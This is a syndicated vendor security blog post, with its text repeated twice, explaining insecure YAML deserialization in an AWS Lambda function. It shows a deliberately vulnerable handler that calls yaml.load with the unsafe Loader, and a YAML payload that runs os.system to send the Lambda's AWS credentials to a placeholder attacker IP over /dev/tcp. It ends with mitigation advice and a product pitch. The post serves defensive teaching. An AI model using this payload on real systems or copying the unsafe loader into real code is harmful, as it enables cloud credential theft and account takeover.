SBN

Insecure Deserialization in AWS Lambda | What is the Vulnerability and How to Avoid It? | Contrast Security

Skip to content

Insecure deserialization in AWS Lambda

Insecure deserialization in AWS Lambda

At the beginning of December, many companies worldwide were hit by the newly discovered vulnerability known as Log4Shell. The CVSS classifies this vulnerability as critical, and the impact could be very severe for those who do not fix it. Log4Shell is entered in the category CWE-502 Deserialization of Untrusted Data, a common language issue known as Common Weakness Enumeration (CWE), provided by MITRE. This category of vulnerability is a regular member of the OWASP Top 10 project.

Generally speaking, serialization and deserialization refer to the process of taking program-internal object-related data, packaging it in a way that allows the data to be externally stored or transferred (“serialization”), then extracting the serialized data to reconstruct the original object (“deserialization”). It is often convenient to serialize objects for communication or to save them for later use. However, deserialized data or code can often be modified without using the provided accessor functions, so if it does not use cryptography or another specific component to protect and validate itself, it leaves the door open for attackers to tamper with the serialized object in order to modify the flow of the application, exactly as in the Log4Shell vulnerability.

This kind of attack might be a known risk within a classical environment, but it may occur in a serverless architecture as well. When an application uses a specific method to serialize/deserialize objects, the exploitability is the same in both types of applications. However, the impact might be limited in a serverless architecture because the runtime environments are ephemeral, so it might be harder for an attacker (e.g., persistence, lateral movement) to gain persistence easily. Still, other attacks — like sensitive data exposure (e.g., function code or secret keys) — could easily be carried out.

The serialization/deserialization process is common in many different languages such as Java, Python, JavaScript and C#. Multiple involved libraries could also be affected. For example, when the application parses a YAML file or a JSON object, it executes a deserialization process.

To evaluate the real impact of this kind of exploitation, we created a demo Python function that uses the YAML library, and we are going to exploit the insecure deserialization.

import json
import boto3
import os
import re
import yaml

import uuid
from yaml import Loader

def write_data(data):
    ddb = boto3.client(‘dynamodb’)
    for user in data:
        roles = []
        for r in user[‘roles’]:
            roles.append({ “S”: r })
        res = ddb.put_item(
            TableName=“cn-research-users-yaml-files”,
            Item={
                ‘name’ : { “S”: user[‘name’] },
                ‘roles’ : { “L”: roles }
            }
        )

def lambda_handler(event, context):
    s3 = boto3.client(“s3”)
    for e in event[‘Records’]:
        bucket = e[‘s3’][‘bucket’][‘name’]       
        key = e[“s3”][“object”][“key”]

        tmp_file = str(uuid.uuid4())
        tmp_path = f“/tmp/{tmp_file}”
       
        print(f“downloading file {key} from bucket {bucket} to {tmp_path}”)
        s3.download_file(bucket, key, tmp_path)


        file_content = open(tmp_path, ‘r’).read()
        if os.path.isfile(tmp_path):
            parsed = yaml.load(file_content, Loader)
            write_data(parsed)

    return {
        ‘statusCode’: 200,
        ‘event’: event,
    }

AWS Lambda takes a new YAML file uploaded on a S3 bucket. This file contains a list of users with their own roles, and it will store in a DynamoDB  table. 

An example of a YAML file:



  name: Franc
  roles:
  – admin
  – hr

  name: John
  roles:
  – admin
  – finance

The structure of the YAML file is not important for the outcome of the exploitation. The vulnerable code is the line where the file is loaded without any kind of verification or serialization:

parsed = yaml.load(file_content, Loader)

An attacker is able to forge a YAML file to execute remote commands and can thereby exfiltrate sensitive data from the ephemeral container. 

attack.drawio

For example, the following malicious content resides inside the YAML file. <IP> and <PORT> are the IP address and the TCP port of the attacker’s address, ready to receive exfiltrated data.


!!python/object/apply:os.system [‘echo -e AWS_ACCESS_KEY_ID: $AWS_ACCESS_KEY_ID \nAWS_SECRET_ACCESS_KEY: $AWS_SECRET_ACCESS_KEY \nAWS_SESSION_TOKEN: $AWS_SESSION_TOKEN &>/dev/tcp/<IP>/<PORT>‘]

The information that is extracted from the Lambda’s runtime are its AWS keys, which would then allow the attacker to interact with the cloud and perform other activities, based on the function’s overall permissions.

Exfiltration.mov

In this case, the lambda has the permissions to read files from the S3 bucket and write data to the DynamoDB database. Using CLI, the attacker can then use the stolen credentials to impersonate the function and download all the files from the bucket or can insert his own user directly to the database table, which is an elevated role.

Impersonation dynamodb

How should you avoid insecure deserialization in your serverless environment?

The rule of thumb is to never pass a serialized object from an untrusted source to the deserialize function. 

Contrast Serverless Application Security offers detection capabilities for this vulnerability taxonomy, alerting developers about potential data exposure in their applications during development.

Contrast Security can verify an insecure use of the serialization/deserialization process that can be exploited by an attacker through multiple services, such as S3 or even application programming interfaces (APIs). By using Contrast, your lambda code will be monitored and verified for every change, and the developer will be alerted for exploitable issues we detect, as can be seen in the video below:

lambda scan

Matteo Rosi, Security Researcher at Contrast Security

Matteo Rosi, Security Researcher at Contrast Security

Matteo Rosi, Security Researcher at Contrast Security, is a passionate cyber-security professional with 20 years of experience in the field. Prior to Contrast, he worked as Cyber Security Expert and SOC Manager at Telepass, helping organisations to design and implement all security capabilities and particularly the incident response process. Matteo holds a PhD in Computer Engineering from The University of Florence, the city where he lives with Corinna and their two sons. When Matteo isn’t working hard at Contrast Security, you’ll find him enjoying dying again and again in Elden Ring.

At the beginning of December, many companies worldwide were hit by the newly discovered vulnerability known as Log4Shell. The CVSS classifies this vulnerability as critical, and the impact could be very severe for those who do not fix it. Log4Shell is entered in the category CWE-502 Deserialization of Untrusted Data, a common language issue known as Common Weakness Enumeration (CWE), provided by MITRE. This category of vulnerability is a regular member of the OWASP Top 10 project.

Generally speaking, serialization and deserialization refer to the process of taking program-internal object-related data, packaging it in a way that allows the data to be externally stored or transferred (“serialization”), then extracting the serialized data to reconstruct the original object (“deserialization”). It is often convenient to serialize objects for communication or to save them for later use. However, deserialized data or code can often be modified without using the provided accessor functions, so if it does not use cryptography or another specific component to protect and validate itself, it leaves the door open for attackers to tamper with the serialized object in order to modify the flow of the application, exactly as in the Log4Shell vulnerability.

This kind of attack might be a known risk within a classical environment, but it may occur in a serverless architecture as well. When an application uses a specific method to serialize/deserialize objects, the exploitability is the same in both types of applications. However, the impact might be limited in a serverless architecture because the runtime environments are ephemeral, so it might be harder for an attacker (e.g., persistence, lateral movement) to gain persistence easily. Still, other attacks — like sensitive data exposure (e.g., function code or secret keys) — could easily be carried out.

The serialization/deserialization process is common in many different languages such as Java, Python, JavaScript and C#. Multiple involved libraries could also be affected. For example, when the application parses a YAML file or a JSON object, it executes a deserialization process.

To evaluate the real impact of this kind of exploitation, we created a demo Python function that uses the YAML library, and we are going to exploit the insecure deserialization.

import json
import boto3
import os
import re
import yaml

import uuid
from yaml import Loader

def write_data(data):
    ddb = boto3.client(‘dynamodb’)
    for user in data:
        roles = []
        for r in user[‘roles’]:
            roles.append({ “S”: r })
        res = ddb.put_item(
            TableName=“cn-research-users-yaml-files”,
            Item={
                ‘name’ : { “S”: user[‘name’] },
                ‘roles’ : { “L”: roles }
            }
        )

def lambda_handler(event, context):
    s3 = boto3.client(“s3”)
    for e in event[‘Records’]:
        bucket = e[‘s3’][‘bucket’][‘name’]       
        key = e[“s3”][“object”][“key”]

        tmp_file = str(uuid.uuid4())
        tmp_path = f“/tmp/{tmp_file}”
       
        print(f“downloading file {key} from bucket {bucket} to {tmp_path}”)
        s3.download_file(bucket, key, tmp_path)


        file_content = open(tmp_path, ‘r’).read()
        if os.path.isfile(tmp_path):
            parsed = yaml.load(file_content, Loader)
            write_data(parsed)

    return {
        ‘statusCode’: 200,
        ‘event’: event,
    }

AWS Lambda takes a new YAML file uploaded on a S3 bucket. This file contains a list of users with their own roles, and it will store in a DynamoDB  table. 

An example of a YAML file:



  name: Franc
  roles:
  – admin
  – hr

  name: John
  roles:
  – admin
  – finance

The structure of the YAML file is not important for the outcome of the exploitation. The vulnerable code is the line where the file is loaded without any kind of verification or serialization:

parsed = yaml.load(file_content, Loader)

An attacker is able to forge a YAML file to execute remote commands and can thereby exfiltrate sensitive data from the ephemeral container. 

attack.drawio

For example, the following malicious content resides inside the YAML file. <IP> and <PORT> are the IP address and the TCP port of the attacker’s address, ready to receive exfiltrated data.


!!python/object/apply:os.system [‘echo -e AWS_ACCESS_KEY_ID: $AWS_ACCESS_KEY_ID \nAWS_SECRET_ACCESS_KEY: $AWS_SECRET_ACCESS_KEY \nAWS_SESSION_TOKEN: $AWS_SESSION_TOKEN &>/dev/tcp/<IP>/<PORT>‘]

The information that is extracted from the Lambda’s runtime are its AWS keys, which would then allow the attacker to interact with the cloud and perform other activities, based on the function’s overall permissions.

Exfiltration.mov

In this case, the lambda has the permissions to read files from the S3 bucket and write data to the DynamoDB database. Using CLI, the attacker can then use the stolen credentials to impersonate the function and download all the files from the bucket or can insert his own user directly to the database table, which is an elevated role.

Impersonation dynamodb

How should you avoid insecure deserialization in your serverless environment?

The rule of thumb is to never pass a serialized object from an untrusted source to the deserialize function. 

Contrast Serverless Application Security offers detection capabilities for this vulnerability taxonomy, alerting developers about potential data exposure in their applications during development.

Contrast Security can verify an insecure use of the serialization/deserialization process that can be exploited by an attacker through multiple services, such as S3 or even application programming interfaces (APIs). By using Contrast, your lambda code will be monitored and verified for every change, and the developer will be alerted for exploitable issues we detect, as can be seen in the video below:

lambda scan

*** This is a Security Bloggers Network syndicated blog from AppSec Observer authored by Matteo Rosi, Security Researcher at Contrast Security. Read the original post at: https://www.contrastsecurity.com/security-influencers/insecure-deserialization-in-aws-lambda